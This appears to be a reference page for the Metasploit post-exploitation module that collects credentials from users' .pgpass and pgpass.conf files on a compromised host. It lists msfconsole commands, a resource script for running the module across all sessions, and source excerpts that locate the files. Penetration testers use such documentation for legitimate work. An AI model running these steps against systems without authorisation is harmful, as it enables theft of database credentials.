Multi Gather pgpass Credentials - Metasploit


This page contains detailed information about how to use the post/multi/gather/pgpass_creds metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Multi Gather pgpass Credentials
Module: post/multi/gather/pgpass_creds
Source code: modules/post/multi/gather/pgpass_creds.rb
Disclosure date: -
Last modification time: 2017-07-24 06:26:21 +0000
Supported architecture(s): -
Supported platform(s): BSD, Linux, OSX, Unix, Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will collect the contents of all users' .pgpass or pgpass.conf file and parse them for credentials.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/multi/gather/pgpass_creds

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/multi/gather/pgpass_creds
msf post(pgpass_creds) > show options
    ... show and set options ...
msf post(pgpass_creds) > set SESSION session-id
msf post(pgpass_creds) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/multi/gather/pgpass_creds")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the multi/gather/pgpass_creds post exploitation module looks in the msfconsole:

msf6 > use post/multi/gather/pgpass_creds

msf6 post(multi/gather/pgpass_creds) > show info

       Name: Multi Gather pgpass Credentials
     Module: post/multi/gather/pgpass_creds
   Platform: Linux, BSD, Unix, OSX, Windows
       Arch: 
       Rank: Normal

Provided by:
  Zach Grace <[email protected]>

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module will collect the contents of all users' .pgpass or 
  pgpass.conf file and parse them for credentials.

Module Options


This is a complete list of options available in the multi/gather/pgpass_creds post exploitation module:

msf6 post(multi/gather/pgpass_creds) > show options

Module options (post/multi/gather/pgpass_creds):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the multi/gather/pgpass_creds post exploitation module:

msf6 post(multi/gather/pgpass_creds) > show advanced

Module advanced options (post/multi/gather/pgpass_creds):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the multi/gather/pgpass_creds module can do:

msf6 post(multi/gather/pgpass_creds) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the multi/gather/pgpass_creds post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(multi/gather/pgpass_creds) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Only meterpreter sessions are supported on windows hosts


Here is a relevant code snippet related to the "Only meterpreter sessions are supported on windows hosts" error message:

29:	    case session.platform
30:	    when 'unix', 'linux', 'bsd', 'osx'
31:	      files = enum_user_directories.map {|d| d + "/.pgpass"}.select { |f| file?(f) }
32:	    when 'windows'
33:	      if session.type != "meterpreter"
34:	        print_error("Only meterpreter sessions are supported on windows hosts")
35:	        return
36:	      end
37:	
38:	      grab_user_profiles.select do |user|
39:	        f = "#{user['AppData']}\\postgresql\\pgpass.conf"

Unsupported platform <SESSION.PLATFORM>


Here is a relevant code snippet related to the "Unsupported platform <SESSION.PLATFORM>" error message:

40:	        if user['AppData'] && file?(f)
41:	          files << f
42:	        end
43:	      end
44:	    else
45:	      print_error("Unsupported platform #{session.platform}")
46:	      return
47:	    end
48:	
49:	    if files.nil? || files.empty?
50:	      print_error("No users found with a .pgpass or pgpass.conf file")

No users found with a .pgpass or pgpass.conf file


Here is a relevant code snippet related to the "No users found with a .pgpass or pgpass.conf file" error message:

45:	      print_error("Unsupported platform #{session.platform}")
46:	      return
47:	    end
48:	
49:	    if files.nil? || files.empty?
50:	      print_error("No users found with a .pgpass or pgpass.conf file")
51:	      return
52:	    end
53:	
54:	    files.each do |f|
55:	      # Store the loot

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • Zach Grace <zgrace[at]403labs.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.